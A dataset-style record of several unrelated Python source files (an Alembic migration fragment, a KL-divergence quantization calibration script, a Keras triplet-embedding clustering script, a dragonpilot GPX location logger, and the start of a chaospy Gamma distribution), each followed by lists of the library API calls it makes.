(['"""ix_exceptions_type"""', '"""exceptions"""', "['type']"], {'unique': '(False)'}), "('ix_exceptions_type', 'exceptions', ['type'], unique=False)\n", (1686, 1746), False, 'from alembic import op\n'), ((1867, 1927), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_type"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_type', table_name='exceptions')\n", (1880, 1927), False, 'from alembic import op\n'), ((1932, 1995), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_tech_id"""'], {'table_name': 
'"""exceptions"""'}), "('ix_exceptions_tech_id', table_name='exceptions')\n", (1945, 1995), False, 'from alembic import op\n'), ((2000, 2062), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_source"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_source', table_name='exceptions')\n", (2013, 2062), False, 'from alembic import op\n'), ((2067, 2129), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_region"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_region', table_name='exceptions')\n", (2080, 2129), False, 'from alembic import op\n'), ((2134, 2197), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_item_id"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_item_id', table_name='exceptions')\n", (2147, 2197), False, 'from alembic import op\n'), ((2202, 2268), 'alembic.op.drop_index', 'op.drop_index', (['"""ix_exceptions_account_id"""'], {'table_name': '"""exceptions"""'}), "('ix_exceptions_account_id', table_name='exceptions')\n", (2215, 2268), False, 'from alembic import op\n'), ((2273, 2300), 'alembic.op.drop_table', 'op.drop_table', (['"""exceptions"""'], {}), "('exceptions')\n", (2286, 2300), False, 'from alembic import op\n'), ((1016, 1071), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['account_id']", "['account.id']"], {}), "(['account_id'], ['account.id'])\n", (1039, 1071), True, 'import sqlalchemy as sa\n'), ((1079, 1128), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['item_id']", "['item.id']"], {}), "(['item_id'], ['item.id'])\n", (1102, 1128), True, 'import sqlalchemy as sa\n'), ((1136, 1191), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['tech_id']", "['technology.id']"], {}), "(['tech_id'], ['technology.id'])\n", (1159, 1191), True, 'import sqlalchemy as sa\n'), ((1199, 1228), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1222, 1228), True, 'import sqlalchemy as sa\n'), 
((392, 407), 'sqlalchemy.BigInteger', 'sa.BigInteger', ([], {}), '()\n', (405, 407), True, 'import sqlalchemy as sa\n'), ((450, 471), 'sqlalchemy.String', 'sa.String', ([], {'length': '(256)'}), '(length=256)\n', (459, 471), True, 'import sqlalchemy as sa\n'), ((516, 529), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (527, 529), True, 'import sqlalchemy as sa\n'), ((569, 582), 'sqlalchemy.DateTime', 'sa.DateTime', ([], {}), '()\n', (580, 582), True, 'import sqlalchemy as sa\n'), ((623, 644), 'sqlalchemy.String', 'sa.String', ([], {'length': '(256)'}), '(length=256)\n', (632, 644), True, 'import sqlalchemy as sa\n'), ((688, 709), 'sqlalchemy.String', 'sa.String', ([], {'length': '(512)'}), '(length=512)\n', (697, 709), True, 'import sqlalchemy as sa\n'), ((755, 764), 'sqlalchemy.Text', 'sa.Text', ([], {}), '()\n', (762, 764), True, 'import sqlalchemy as sa\n'), ((806, 826), 'sqlalchemy.String', 'sa.String', ([], {'length': '(32)'}), '(length=32)\n', (815, 826), True, 'import sqlalchemy as sa\n'), ((869, 881), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (879, 881), True, 'import sqlalchemy as sa\n'), ((924, 936), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (934, 936), True, 'import sqlalchemy as sa\n'), ((982, 994), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (992, 994), True, 'import sqlalchemy as sa\n')] |
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
from scipy import stats
class QuantizeLayer:
def __init__(self, name="None", num_bin=2001):
self.name = name
self.min = 0.0
self.max = 0.0
self.edge = 0.0
self.num_bins = num_bin
self.distribution_interval = 0.0
self.data_distribution = []
@staticmethod
def get_max_min_edge(blob_data):
max_val = np.max(blob_data)
min_val = np.min(blob_data)
data_edge = max(abs(max_val), abs(min_val))
return max_val, min_val, data_edge
def initial_histograms(self, blob_data):
max_val, min_val, data_edge = self.get_max_min_edge(blob_data)
hist, hist_edges = np.histogram(blob_data, bins=self.num_bins, range=(-data_edge, data_edge))
self.distribution_interval = 2 * data_edge / len(hist)
self.data_distribution = hist
self.edge = data_edge
self.min = min_val
self.max = max_val
def combine_histograms(self, blob_data):
"""
:param blob_data:
:return:
"""
# hist is the num of each bin, the edge of each bin is [)
max_val, min_val, data_edge = self.get_max_min_edge(blob_data)
if data_edge <= self.edge:
hist, _ = np.histogram(blob_data, bins=len(self.data_distribution), range=(-self.edge, self.edge))
self.data_distribution += hist
else:
old_num_bins = len(self.data_distribution)
old_step = 2 * self.edge / old_num_bins
half_increased_bins = int((data_edge - self.edge) // old_step + 1)
new_num_bins = half_increased_bins * 2 + old_num_bins
data_edge = half_increased_bins * old_step + self.edge
hist, hist_edges = np.histogram(blob_data, bins=new_num_bins, range=(-data_edge, data_edge))
hist[half_increased_bins:new_num_bins - half_increased_bins] += self.data_distribution
self.data_distribution = hist
self.edge = data_edge
self.min = min(min_val, self.min)
self.max = max(max_val, self.max)
self.distribution_interval = 2 * self.edge / len(self.data_distribution)
@staticmethod
def smooth_distribution(p, eps=0.0001):
is_zeros = (p == 0).astype(np.float32)
is_nonzeros = (p != 0).astype(np.float32)
n_zeros = is_zeros.sum()
n_nonzeros = p.size - n_zeros
if not n_nonzeros:
raise ValueError('The discrete probability distribution is malformed. All entries are 0.')
eps1 = eps * float(n_zeros) / float(n_nonzeros)
assert eps1 < 1.0, 'n_zeros=%d, n_nonzeros=%d, eps1=%f' % (n_zeros, n_nonzeros, eps1)
hist = p.astype(np.float32)
hist += eps * is_zeros + (-eps1) * is_nonzeros
assert (hist <= 0).sum() == 0
return hist
@property
def threshold_distribution(self, target_bin=256):
"""
:param quantized_dtype:
:param target_bin:
:return:
"""
num_bins = len(self.data_distribution)
distribution = self.data_distribution
assert (num_bins % 2 == 1)
# if min_val >= 0 and quantized_dtype in ['auto', 'uint8']:
# target_bin = 128
threshold_sum = sum(distribution[target_bin:])
kl_divergence = np.zeros(num_bins - target_bin)
for threshold in range(target_bin, num_bins):
sliced_nd_hist = copy.deepcopy(distribution[:threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
p[threshold - 1] += threshold_sum
threshold_sum = threshold_sum - distribution[threshold]
# is_nonzeros[k] indicates whether hist[k] is nonzero
p = np.array(p)
nonzero_loc = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = len(sliced_nd_hist) // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = nonzero_loc[start:stop].sum()
if norm != 0:
q[start:stop] = quantized_bins[j] / norm
q[p == 0] = 0.0001
p = self.smooth_distribution(p)
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.entropy(p, q)
min_kl_divergence = np.argmin(kl_divergence)
threshold_bin = min_kl_divergence + target_bin
threshold_value = (threshold_bin + 0.5) * self.distribution_interval + (-self.edge)
return threshold_value
@staticmethod
def max_slide_window(seq, m):
num = len(seq)
seq = seq.tolist()
assert isinstance(seq, (list, tuple, set)) and isinstance(m, int), "seq array"
assert len(seq) > m, "len(seq) must >m"
max_seq = 0
loc = 0
for i in range(0, num):
if (i + m) <= num:
temp_seq = seq[i:i + m]
temp_sum = sum(temp_seq)
if max_seq <= temp_sum:
max_seq = temp_sum
loc = i
else:
return max_seq, loc
@property
def distribution_min_max(self, target_bin=256):
num_bins = len(self.data_distribution)
distribution = self.data_distribution
assert (num_bins % 2 == 1)
kl_divergence = np.zeros(num_bins - target_bin)
kl_loc = np.zeros(num_bins - target_bin)
for threshold in range(target_bin, num_bins):
#print("num:", threshold)
_, loc = self.max_slide_window(distribution, threshold)
sliced_nd_hist = copy.deepcopy(distribution[loc:loc + threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
right_sum = sum(distribution[loc + threshold:])
left_sum = sum(distribution[:loc])
p[threshold - 1] += right_sum
p[0] += left_sum
# is_nonzeros[k] indicates whether hist[k] is nonzero
p = np.array(p)
nonzero_loc = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = len(sliced_nd_hist) // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = nonzero_loc[start:stop].sum()
if norm != 0:
q[start:stop] = quantized_bins[j] / norm
q[p == 0] = 0.0001
p = self.smooth_distribution(p)
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.entropy(p, q)
kl_loc[threshold - target_bin] = loc
min_kl_divergence = np.argmin(kl_divergence)
min = kl_loc[min_kl_divergence]
max = min + target_bin + min_kl_divergence
min = (min + 0.5) * self.distribution_interval + (-self.edge)
max = (max + 0.5) * self.distribution_interval + (-self.edge)
return min, max
@property
def distribution_test(self, target_bin=256):
num_bins = len(self.data_distribution)
distribution = self.data_distribution
assert (num_bins % 2 == 1)
kl_divergence = np.zeros(num_bins - target_bin)
kl_loc = np.zeros(num_bins - target_bin)
for threshold in range(target_bin, num_bins):
#print("num:", threshold)
_, loc = self.max_slide_window(distribution, threshold)
sliced_nd_hist = copy.deepcopy(distribution[loc:loc + threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
right_sum = sum(distribution[loc + threshold:])
left_sum = sum(distribution[:loc])
p[threshold - 1] += right_sum
p[0] += left_sum
# is_nonzeros[k] indicates whether hist[k] is nonzero
p = np.array(p)
nonzero_loc = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = len(sliced_nd_hist) // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = nonzero_loc[start:stop].sum()
if norm != 0:
q[start:stop] = quantized_bins[j] / norm
q[p == 0] = 0.0001
p = self.smooth_distribution(p)
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.wasserstein_distance(p, q)
kl_loc[threshold - target_bin] = loc
min_kl_divergence = np.argmin(kl_divergence)
min = kl_loc[min_kl_divergence]
max = min + target_bin + min_kl_divergence
min = (min + 0.5) * self.distribution_interval + (-self.edge)
max = (max + 0.5) * self.distribution_interval + (-self.edge)
return min, max
data = np.random.randn(10000,)
print(data)
layer = QuantizeLayer(name="con_1")
layer.initial_histograms(data)
print("min:", layer.min)
print("max:", layer.max)
print("edge:", layer.edge)
print("distribution_interval:", layer.distribution_interval)
print("bins:", len(layer.data_distribution))
data = np.random.randn(10000,).astype()
layer.combine_histograms(data)
print("min:", layer.min)
print("max:", layer.max)
print("edge:", layer.edge)
print("distribution_interval:", layer.distribution_interval)
print("bins:", len(layer.data_distribution))
data = np.random.randn(10000,)
data[9999] = 20
layer.combine_histograms(data)
print("min:", layer.min)
print("max:", layer.max)
print("edge:", layer.edge)
print("distribution_interval:", layer.distribution_interval)
print("bins:", len(layer.data_distribution))
import matplotlib.pyplot as plt
plt.plot(layer.data_distribution)
plt.show()
print(layer.threshold_distribution)
print(layer.distribution_min_max)
#print(layer.distribution_test) | [
"numpy.histogram",
"scipy.stats.entropy",
"copy.deepcopy",
"matplotlib.pyplot.plot",
"numpy.max",
"numpy.array",
"numpy.zeros",
"scipy.stats.wasserstein_distance",
"numpy.min",
"numpy.argmin",
"numpy.random.randn",
"matplotlib.pyplot.show"
] | [((11155, 11177), 'numpy.random.randn', 'np.random.randn', (['(10000)'], {}), '(10000)\n', (11170, 11177), True, 'import numpy as np\n'), ((11703, 11725), 'numpy.random.randn', 'np.random.randn', (['(10000)'], {}), '(10000)\n', (11718, 11725), True, 'import numpy as np\n'), ((11990, 12023), 'matplotlib.pyplot.plot', 'plt.plot', (['layer.data_distribution'], {}), '(layer.data_distribution)\n', (11998, 12023), True, 'import matplotlib.pyplot as plt\n'), ((12024, 12034), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12032, 12034), True, 'import matplotlib.pyplot as plt\n'), ((477, 494), 'numpy.max', 'np.max', (['blob_data'], {}), '(blob_data)\n', (483, 494), True, 'import numpy as np\n'), ((513, 530), 'numpy.min', 'np.min', (['blob_data'], {}), '(blob_data)\n', (519, 530), True, 'import numpy as np\n'), ((770, 844), 'numpy.histogram', 'np.histogram', (['blob_data'], {'bins': 'self.num_bins', 'range': '(-data_edge, data_edge)'}), '(blob_data, bins=self.num_bins, range=(-data_edge, data_edge))\n', (782, 844), True, 'import numpy as np\n'), ((3386, 3417), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (3394, 3417), True, 'import numpy as np\n'), ((5188, 5212), 'numpy.argmin', 'np.argmin', (['kl_divergence'], {}), '(kl_divergence)\n', (5197, 5212), True, 'import numpy as np\n'), ((6192, 6223), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (6200, 6223), True, 'import numpy as np\n'), ((6241, 6272), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (6249, 6272), True, 'import numpy as np\n'), ((8274, 8298), 'numpy.argmin', 'np.argmin', (['kl_divergence'], {}), '(kl_divergence)\n', (8283, 8298), True, 'import numpy as np\n'), ((8772, 8803), 'numpy.zeros', 'np.zeros', (['(num_bins - target_bin)'], {}), '(num_bins - target_bin)\n', (8780, 8803), True, 'import numpy as np\n'), ((8821, 8852), 'numpy.zeros', 'np.zeros', (['(num_bins - 
target_bin)'], {}), '(num_bins - target_bin)\n', (8829, 8852), True, 'import numpy as np\n'), ((10867, 10891), 'numpy.argmin', 'np.argmin', (['kl_divergence'], {}), '(kl_divergence)\n', (10876, 10891), True, 'import numpy as np\n'), ((11448, 11470), 'numpy.random.randn', 'np.random.randn', (['(10000)'], {}), '(10000)\n', (11463, 11470), True, 'import numpy as np\n'), ((1834, 1907), 'numpy.histogram', 'np.histogram', (['blob_data'], {'bins': 'new_num_bins', 'range': '(-data_edge, data_edge)'}), '(blob_data, bins=new_num_bins, range=(-data_edge, data_edge))\n', (1846, 1907), True, 'import numpy as np\n'), ((3502, 3541), 'copy.deepcopy', 'copy.deepcopy', (['distribution[:threshold]'], {}), '(distribution[:threshold])\n', (3515, 3541), False, 'import copy\n'), ((3826, 3837), 'numpy.array', 'np.array', (['p'], {}), '(p)\n', (3834, 3837), True, 'import numpy as np\n'), ((3933, 3969), 'numpy.zeros', 'np.zeros', (['target_bin'], {'dtype': 'np.int64'}), '(target_bin, dtype=np.int64)\n', (3941, 3969), True, 'import numpy as np\n'), ((4537, 4584), 'numpy.zeros', 'np.zeros', (['sliced_nd_hist.size'], {'dtype': 'np.float64'}), '(sliced_nd_hist.size, dtype=np.float64)\n', (4545, 4584), True, 'import numpy as np\n'), ((5139, 5158), 'scipy.stats.entropy', 'stats.entropy', (['p', 'q'], {}), '(p, q)\n', (5152, 5158), False, 'from scipy import stats\n'), ((6465, 6513), 'copy.deepcopy', 'copy.deepcopy', (['distribution[loc:loc + threshold]'], {}), '(distribution[loc:loc + threshold])\n', (6478, 6513), False, 'import copy\n'), ((6863, 6874), 'numpy.array', 'np.array', (['p'], {}), '(p)\n', (6871, 6874), True, 'import numpy as np\n'), ((6970, 7006), 'numpy.zeros', 'np.zeros', (['target_bin'], {'dtype': 'np.int64'}), '(target_bin, dtype=np.int64)\n', (6978, 7006), True, 'import numpy as np\n'), ((7574, 7621), 'numpy.zeros', 'np.zeros', (['sliced_nd_hist.size'], {'dtype': 'np.float64'}), '(sliced_nd_hist.size, dtype=np.float64)\n', (7582, 7621), True, 'import numpy as np\n'), ((8176, 
8195), 'scipy.stats.entropy', 'stats.entropy', (['p', 'q'], {}), '(p, q)\n', (8189, 8195), False, 'from scipy import stats\n'), ((9045, 9093), 'copy.deepcopy', 'copy.deepcopy', (['distribution[loc:loc + threshold]'], {}), '(distribution[loc:loc + threshold])\n', (9058, 9093), False, 'import copy\n'), ((9443, 9454), 'numpy.array', 'np.array', (['p'], {}), '(p)\n', (9451, 9454), True, 'import numpy as np\n'), ((9550, 9586), 'numpy.zeros', 'np.zeros', (['target_bin'], {'dtype': 'np.int64'}), '(target_bin, dtype=np.int64)\n', (9558, 9586), True, 'import numpy as np\n'), ((10154, 10201), 'numpy.zeros', 'np.zeros', (['sliced_nd_hist.size'], {'dtype': 'np.float64'}), '(sliced_nd_hist.size, dtype=np.float64)\n', (10162, 10201), True, 'import numpy as np\n'), ((10756, 10788), 'scipy.stats.wasserstein_distance', 'stats.wasserstein_distance', (['p', 'q'], {}), '(p, q)\n', (10782, 10788), False, 'from scipy import stats\n')] |
import keras
import pandas as pd
import urllib2
from bs4 import BeautifulSoup
from pprint import pprint
from matplotlib import pyplot as plt
import sys
sys.path.append('/Users/BenJohnson/projects/what-is-this/wit/')
from wit import *
pd.set_option('display.max_rows', 50)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 120)
np.set_printoptions(linewidth=100)
# --
# Config + Init
num_features = 75 # Character
# max_len = 100 # Character
max_len = 350
formatter = KerasFormatter(num_features, max_len)
# --
# Load and format data
in_store = pd.HDFStore(
'/Users/BenJohnson/projects/what-is-this/qpr/gun_leaves_20151118_v2.h5',
complevel = 9,
complib = 'bzip2'
)
source = in_store.keys()[3]
df = in_store[source]
in_store.close()
# Subset to frequent paths
chash = df.groupby('hash').apply(lambda x: len(x.obj.unique()))
keep = list(chash[chash > 100].index)
df = df[df.hash.apply(lambda x: x in keep)]
df['content'] = df.obj.apply(lambda x: BeautifulSoup(x).text.encode('utf8'))
# --
# Make all pairs
train = make_triplet_train(df, N = 600)
pd.crosstab(train.doc, train.hash)
trn, _ = formatter.format(train, ['content'], 'hash')
# Test set of all unique points
unq = df.copy()
del unq['id']
unq = unq.drop_duplicates()
awl, _ = formatter.format(unq, ['content'], 'hash')
# --
# Defining model
recurrent_size = 32
dense_size = 5
model = Sequential()
model.add(Embedding(num_features, recurrent_size))
model.add(LSTM(recurrent_size))
model.add(Dense(dense_size))
model.add(Activation('unit_norm'))
model.compile(loss = 'triplet_euclidean', optimizer = 'adam')
# --
# Training model
# Shuffles while maintaining groups
ms = modsel(train.shape[0], N = 3)
_ = model.fit(
trn['x'][0][ms], trn['x'][0][ms],
nb_epoch = 1,
batch_size = 3 * 250,
shuffle = False
)
preds = model.predict(awl['x'][0], verbose = True)
colors = awl['y'].argmax(1)
plt.scatter(preds[:,0], preds[:,1], c = colors)
plt.show()
# --
# Clustering results
#
# Could do better -- actually may want some kind of metric for "projection overlap"
from sklearn.cluster import DBSCAN
db = DBSCAN(eps = .1, min_samples = 50).fit(preds)
res = unq.hash.groupby(db.labels_).apply(lambda x: x.value_counts()).reset_index()
res.columns = ('cluster', 'hash', 'cnt')
res = res.sort('hash')
good_res = res[(res.cnt > 50) & (res.cluster > -1)]
good_res
sorted(res.hash.unique())
sorted(good_res.hash.unique())
eqv = list(good_res.groupby('cluster').hash.apply(lambda x: list(x)))
eqv = map(eval, np.unique(map(str, eqv)))
print_eqv(eqv, df)
| [
"pandas.crosstab",
"pandas.set_option",
"bs4.BeautifulSoup",
"matplotlib.pyplot.scatter",
"pandas.HDFStore",
"sys.path.append",
"sklearn.cluster.DBSCAN",
"matplotlib.pyplot.show"
] | [((154, 217), 'sys.path.append', 'sys.path.append', (['"""/Users/BenJohnson/projects/what-is-this/wit/"""'], {}), "('/Users/BenJohnson/projects/what-is-this/wit/')\n", (169, 217), False, 'import sys\n'), ((237, 274), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(50)'], {}), "('display.max_rows', 50)\n", (250, 274), True, 'import pandas as pd\n'), ((275, 316), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(500)'], {}), "('display.max_columns', 500)\n", (288, 316), True, 'import pandas as pd\n'), ((317, 352), 'pandas.set_option', 'pd.set_option', (['"""display.width"""', '(120)'], {}), "('display.width', 120)\n", (330, 352), True, 'import pandas as pd\n'), ((586, 709), 'pandas.HDFStore', 'pd.HDFStore', (['"""/Users/BenJohnson/projects/what-is-this/qpr/gun_leaves_20151118_v2.h5"""'], {'complevel': '(9)', 'complib': '"""bzip2"""'}), "(\n '/Users/BenJohnson/projects/what-is-this/qpr/gun_leaves_20151118_v2.h5',\n complevel=9, complib='bzip2')\n", (597, 709), True, 'import pandas as pd\n'), ((1112, 1146), 'pandas.crosstab', 'pd.crosstab', (['train.doc', 'train.hash'], {}), '(train.doc, train.hash)\n', (1123, 1146), True, 'import pandas as pd\n'), ((1940, 1987), 'matplotlib.pyplot.scatter', 'plt.scatter', (['preds[:, 0]', 'preds[:, 1]'], {'c': 'colors'}), '(preds[:, 0], preds[:, 1], c=colors)\n', (1951, 1987), True, 'from matplotlib import pyplot as plt\n'), ((1988, 1998), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1996, 1998), True, 'from matplotlib import pyplot as plt\n'), ((2152, 2183), 'sklearn.cluster.DBSCAN', 'DBSCAN', ([], {'eps': '(0.1)', 'min_samples': '(50)'}), '(eps=0.1, min_samples=50)\n', (2158, 2183), False, 'from sklearn.cluster import DBSCAN\n'), ((1010, 1026), 'bs4.BeautifulSoup', 'BeautifulSoup', (['x'], {}), '(x)\n', (1023, 1026), False, 'from bs4 import BeautifulSoup\n')] |
#!/usr/bin/env python3
import cereal.messaging as messaging
import os
import datetime
import signal
import threading
from common.realtime import Ratekeeper
# customisable values
GPX_LOG_PATH = '/data/media/0/gpx_logs/'
LOG_HERTZ = 10 # 10 hz = 0.1 sec, higher for higher accuracy, 10hz seems fine
LOG_LENGTH = 10 # mins, higher means it keeps more data in the memory, will take more time to write into a file too.
LOST_SIGNAL_COUNT_LENGTH = 30 # secs, output log file if we lost signal for this long
# do not change
LOST_SIGNAL_COUNT_MAX = LOST_SIGNAL_COUNT_LENGTH * LOG_HERTZ # secs,
LOGS_PER_FILE = LOG_LENGTH * 60 * LOG_HERTZ # e.g. 10 * 60 * 10 = 6000 points per file
class WaitTimeHelper:
ready_event = threading.Event()
shutdown = False
def __init__(self):
signal.signal(signal.SIGTERM, self.graceful_shutdown)
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGHUP, self.graceful_shutdown)
def graceful_shutdown(self, signum, frame):
self.shutdown = True
self.ready_event.set()
class GpxD():
def __init__(self):
self.log_count = 0
self.logs = list()
self.lost_signal_count = 0
self.wait_helper = WaitTimeHelper()
self.started_time = datetime.datetime.utcnow().isoformat()
def log(self, sm):
gps = sm['gpsLocationExternal']
# do not log when no fix or accuracy is too low, add lost_signal_count
if gps.flags % 2 == 0 or gps.accuracy > 5.:
if self.log_count > 0:
self.lost_signal_count += 1
else:
self.logs.append([datetime.datetime.utcfromtimestamp(gps.timestamp*0.001).isoformat(), str(gps.latitude), str(gps.longitude), str(gps.altitude)])
self.log_count += 1
self.lost_signal_count = 0
def write_log(self, force = False):
if self.log_count == 0:
return
if force or (self.log_count >= LOGS_PER_FILE or self.lost_signal_count >= LOST_SIGNAL_COUNT_MAX):
self._write_gpx()
self.lost_signal_count = 0
self.log_count = 0
self.logs.clear()
self.started_time = datetime.datetime.utcnow().isoformat()
def _write_gpx(self):
if len(self.logs) > 0:
if not os.path.exists(GPX_LOG_PATH):
os.makedirs(GPX_LOG_PATH)
filename = self.started_time.replace(':','-')
str = ''
str += "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\n"
str += "<gpx version=\"1.1\" creator=\"dragonpilot https://github.com/dragonpilot-community/dragonpilot\" xmlns=\"http://www.topografix.com/GPX/1/1\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd\">\n"
str += "<trk>\n"
str += " <name>" + self.started_time + "</name>"
str += " <trkseg>\n"
for trkpt in self.logs:
str += self._trkpt_template(trkpt[1], trkpt[2], trkpt[3], trkpt[0])
str += " </trkseg>\n"
str += "</trk>\n"
str += "</gpx>\n"
try:
f = open('%s%sZ.gpx' % (GPX_LOG_PATH, filename), 'w')
f.write(str)
f.close()
except:
pass
def _trkpt_template(self, lat, lon, ele, time):
str = ""
str += " <trkpt lat=\"" + lat + "\" lon=\"" + lon + "\">\n"
str += " <ele>" + ele + "</ele>\n"
str += " <time>" + time + "</time>\n"
str += " </trkpt>\n"
return str
def gpxd_thread(sm=None, pm=None):
if sm is None:
sm = messaging.SubMaster(['gpsLocationExternal'])
wait_helper = WaitTimeHelper()
gpxd = GpxD()
rk = Ratekeeper(LOG_HERTZ, print_delay_threshold=None)
while True:
sm.update(0)
gpxd.log(sm)
gpxd.write_log()
if wait_helper.shutdown:
gpxd.write_log(True)
break
rk.keep_time()
def main(sm=None, pm=None):
gpxd_thread(sm, pm)
if __name__ == "__main__":
main()
| [
"datetime.datetime.utcfromtimestamp",
"os.path.exists",
"signal.signal",
"os.makedirs",
"datetime.datetime.utcnow",
"cereal.messaging.SubMaster",
"threading.Event",
"common.realtime.Ratekeeper"
] | [((713, 730), 'threading.Event', 'threading.Event', ([], {}), '()\n', (728, 730), False, 'import threading\n'), ((3531, 3580), 'common.realtime.Ratekeeper', 'Ratekeeper', (['LOG_HERTZ'], {'print_delay_threshold': 'None'}), '(LOG_HERTZ, print_delay_threshold=None)\n', (3541, 3580), False, 'from common.realtime import Ratekeeper\n'), ((777, 830), 'signal.signal', 'signal.signal', (['signal.SIGTERM', 'self.graceful_shutdown'], {}), '(signal.SIGTERM, self.graceful_shutdown)\n', (790, 830), False, 'import signal\n'), ((835, 887), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'self.graceful_shutdown'], {}), '(signal.SIGINT, self.graceful_shutdown)\n', (848, 887), False, 'import signal\n'), ((892, 944), 'signal.signal', 'signal.signal', (['signal.SIGHUP', 'self.graceful_shutdown'], {}), '(signal.SIGHUP, self.graceful_shutdown)\n', (905, 944), False, 'import signal\n'), ((3429, 3473), 'cereal.messaging.SubMaster', 'messaging.SubMaster', (["['gpsLocationExternal']"], {}), "(['gpsLocationExternal'])\n", (3448, 3473), True, 'import cereal.messaging as messaging\n'), ((1222, 1248), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (1246, 1248), False, 'import datetime\n'), ((2148, 2176), 'os.path.exists', 'os.path.exists', (['GPX_LOG_PATH'], {}), '(GPX_LOG_PATH)\n', (2162, 2176), False, 'import os\n'), ((2186, 2211), 'os.makedirs', 'os.makedirs', (['GPX_LOG_PATH'], {}), '(GPX_LOG_PATH)\n', (2197, 2211), False, 'import os\n'), ((2044, 2070), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (2068, 2070), False, 'import datetime\n'), ((1542, 1599), 'datetime.datetime.utcfromtimestamp', 'datetime.datetime.utcfromtimestamp', (['(gps.timestamp * 0.001)'], {}), '(gps.timestamp * 0.001)\n', (1576, 1599), False, 'import datetime\n')] |
"""Gamma distribution."""
import numpy
from scipy import special
from ..baseclass import Dist
from ..operators.addition import Add
class gamma(Dist):
def __init__(self, a=1):
Dist.__init__(self, a=a)
def _pdf(self, x, a):
return x**(a-1)*numpy.e**(-x) / special.gamma(a)
def _cdf(self, x, a):
return special.gammainc(a, x)
def _ppf(self, q, a):
return special.gammaincinv(a, q)
def _mom(self, k, a):
return special.gamma(a+k)/special.gamma(a)
def _ttr(self, n, a):
return 2.*n+a, n*n+n*(a-1)
def _lower(self, a):
return 0.
def _upper(self, a):
return 40+2*a
class Gamma(Add):
"""
Gamma distribution.
Also an Erlang distribution when shape=k and scale=1./lamb.
Args:
shape (float, Dist):
Shape parameter. a>0.
scale (float, Dist):
Scale parameter. scale!=0
shift (float, Dist):
Location of the lower bound.
Examples:
>>> distribution = chaospy.Gamma(1, 1, 1)
>>> distribution
Gamma(scale=1, shape=1, shift=1)
>>> q = numpy.linspace(0,1,6)[1:-1]
>>> distribution.inv(q).round(4)
